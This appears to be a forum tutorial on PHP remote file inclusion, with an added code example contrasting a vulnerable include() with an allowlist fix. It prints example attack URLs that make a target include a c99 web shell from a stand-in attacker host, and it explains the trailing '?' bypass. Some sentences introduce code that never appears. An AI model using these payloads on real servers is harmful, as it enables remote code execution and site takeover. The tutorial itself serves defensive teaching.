Basic Remote File Inclusion

Definition
Remote file inclusion, commonly known as RFI, is a form of attack where the attacker tries to inject their own PHP code into your PHP application. If an attacker can successfully achieve this, they will be able to execute any code they wish on your web server.
Example
Let's say we have a website that is coded in PHP. The website uses something like page=page.html to work out which page should be displayed. The code for this might look like


http://www.sitetarget.com/index.php?page=http://www.attackersite.com/c99shell.txt?

If we take a look at what is happening on the code side of things once this has been done, we can see that the actual code that the web server is executing looks like this:


What the above script does is add .php to anything that is passed into it. So if we passed it

http://www.attackersite.com/my_evil_script.txt

then what we are going to see in the include() function is

http://www.attackersite.com/my_evil_script.txt.php

This is bad. What this means is that we won't actually get our script executed, as it doesn't exist now. So if we pass a ? on the end of the script, the .php is treated as if it were a variable that is getting passed to the script. So now the include() function looks like

http://www.attackersite.com/my_evil_script.txt?.php

and it will still get executed.
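The two snippets below are an added example and not the original post's code. The first is an assumed reconstruction of the vulnerable pattern the post describes (the `page` parameter concatenated with `.php` and handed straight to `include()`); the second is a hardened version that maps the untrusted parameter onto an allowlist of known files, so nothing from the request ever reaches `include()` directly. The file names and the `load_page_*`/`resolve_page` function names are made up for the example.

```php
<?php
// Added example, not the post's own code. Shows the vulnerable include
// pattern next to a hardened allowlist version.

// VULNERABLE (assumed reconstruction of the pattern the post describes):
// whatever arrives in ?page= is concatenated with '.php' and included.
// If allow_url_include is enabled, a remote URL in ?page= is fetched and
// executed; the trailing '?' in the post's example turns the appended
// '.php' into a query string on the remote URL, so the remote file still
// loads. Local file inclusion is possible even without remote URLs.
function load_page_vulnerable(string $page): void
{
    include($page . '.php');
}

// HARDENED: the request parameter is only ever used as a lookup key.
// Paths are hard coded here; the request cannot influence them.
const ALLOWED_PAGES = [
    'home'    => 'pages/home.php',     // constructed sample paths
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(?string $page): string
{
    // Unknown or missing values fall back to a default page rather than
    // including anything derived from the request.
    if ($page === null || !array_key_exists($page, ALLOWED_PAGES)) {
        return ALLOWED_PAGES['home'];
    }
    return ALLOWED_PAGES[$page];
}

function load_page_hardened(?string $page): void
{
    include(resolve_page($page));
}

// Usage: $page comes straight from the request; only the hardened
// version should ever be deployed.
$page = $_GET['page'] ?? null;
load_page_hardened($page);
```

The allowlist is the real fix: checking for `http://` in the input or stripping `..` is not enough, because there are many encodings and wrappers that bypass string filters. As defence in depth, keep `allow_url_include = Off` in php.ini (it is off by default) so `include()` refuses remote URLs even if application code is wrong, and watch web server logs for `page=` values containing `://`, which is a cheap detection signal for attempts like the one in this post.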
Conclusion
There you have it: a basic tutorial on what remote file inclusion is and how/why an attacker can use it against your servers. This kind of attack, just like most attacks, isn't that hard to stop if you don't trust any data that is coming in to you. All you really have to remember is that if the data isn't hard coded, then you need to check it to make sure it does what it is meant to do. A lot of the attacks that are performed can be stopped by a few simple checks on the data.

regards
k3nz0
